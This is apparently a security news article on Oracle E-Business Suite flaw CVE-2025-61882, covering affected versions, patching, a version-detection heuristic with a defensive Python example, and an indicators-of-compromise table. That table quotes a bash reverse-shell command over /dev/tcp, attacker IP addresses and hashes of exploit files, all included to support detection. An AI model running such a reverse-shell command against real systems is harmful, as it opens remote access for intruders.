Red Hot Cyber, The cybersecurity news


Oracle E-Business Suite 9.8 Vulnerability: Urgent Updates Needed

Redazione RHC: 5 October 2025 21:29

Oracle has published a security advisory regarding a critical vulnerability identified as CVE-2025-61882 in the Oracle E-Business Suite. The flaw can be exploited remotely without authentication, potentially allowing malicious code to be executed on affected systems.

The company recommends that its customers immediately apply the updates outlined in the advisory. Oracle emphasizes the importance of maintaining actively supported product versions and installing all critical security patches promptly. In particular, applying the critical patches released in October 2023 is a prerequisite for installing the new fixes.

To support immediate detection and containment of potential attacks, the alert includes a risk matrix with indicators of compromise, such as suspicious IP addresses, commands, and files associated with known exploits.

Affected products and available patches

The vulnerability specifically affects Oracle E-Business Suite versions 12.2.3 through 12.2.14. The official documentation, available through the links provided by Oracle, contains detailed information about the patches and how to install them.

| Affected products and versions | Patch Availability Document |
|---|---|
| Oracle E-Business Suite, versions 12.2.3–12.2.14 | Oracle E-Business Suite |

Legacy Support and Versions

Patches provided through the Security Alert program are available only for versions covered by Premier Support or Extended Support under Oracle’s Lifetime Support Policy.

Versions not included in these programs are not tested for reported vulnerabilities, even though they may still be affected. For this reason, Oracle recommends upgrading to supported versions to ensure protection and compatibility with security patches.

How to check if you are affected by the bug

CVE-2025-61882 affects Oracle E-Business Suite and is remotely exploitable without authentication, potentially resulting in remote code execution if successfully exploited.

A public detection method has been published on GitHub that helps identify potentially outdated instances. The method flags an instance as suspicious when the page returns the string “E-Business Suite Home Page” and the HTTP Last-Modified header reports a date before October 4, 2025 (Unix timestamp 1759602752).

This approach is described as a detection tool, not an attack vector, and should be used for verification and defense purposes only. To mitigate the risk, Oracle recommends applying the patches outlined in the security advisory and updating to supported versions.
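The two-condition check described above can be applied offline to responses already captured from your own instances. The following is an added example, not the code published on GitHub; the function name, verdict labels and sample responses are assumptions constructed for illustration, while the marker string and cutoff timestamp come from the article.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Both values are quoted in the article.
MARKER = "E-Business Suite Home Page"
CUTOFF = datetime.fromtimestamp(1759602752, tz=timezone.utc)


def classify_response(headers, body):
    """Apply the heuristic to one captured HTTP response.

    Returns 'not-ebs', 'suspicious', 'recent', or 'unknown' when the page
    matches but Last-Modified is missing or cannot be parsed.
    """
    if MARKER not in body:
        return "not-ebs"
    # HTTP header names are case-insensitive; normalise before lookup.
    lowered = {name.lower(): value for name, value in headers.items()}
    raw = lowered.get("last-modified")
    if raw is None:
        return "unknown"
    try:
        modified = parsedate_to_datetime(raw.strip())
    except (TypeError, ValueError):
        return "unknown"
    if modified.tzinfo is None:  # a "-0000" zone parses as naive; treat as UTC
        modified = modified.replace(tzinfo=timezone.utc)
    return "suspicious" if modified < CUTOFF else "recent"


# Constructed sample captures (hypothetical hosts, not real systems).
PAGE = "<html><title>E-Business Suite Home Page</title></html>"
SAMPLES = {
    "ebs-old.example": ({"Last-Modified": "Tue, 12 Aug 2025 09:15:00 GMT"}, PAGE),
    "ebs-new.example": ({"last-modified": "Mon, 06 Oct 2025 10:00:00 GMT"}, PAGE),
    "ebs-nohdr.example": ({"Server": "constructed"}, PAGE),
    "ebs-baddate.example": ({"Last-Modified": "yesterday"}, PAGE),
    "other.example": ({"Last-Modified": "Tue, 12 Aug 2025 09:15:00 GMT"}, "<html>Welcome</html>"),
}


def triage(samples):
    """Map each host to its verdict so stale instances can be prioritised."""
    return {host: classify_response(h, b) for host, (h, b) in samples.items()}


if __name__ == "__main__":
    for host, verdict in triage(SAMPLES).items():
        print(f"{host}: {verdict}")
```

A "suspicious" verdict only marks an instance as potentially outdated; confirm the patch level against Oracle's advisory before drawing conclusions.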

Indicators of Compromise (IOC)

Below are indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, investigation, and containment.

| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp//0>&1 | Command | Establish an outgoing TCP connection on a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
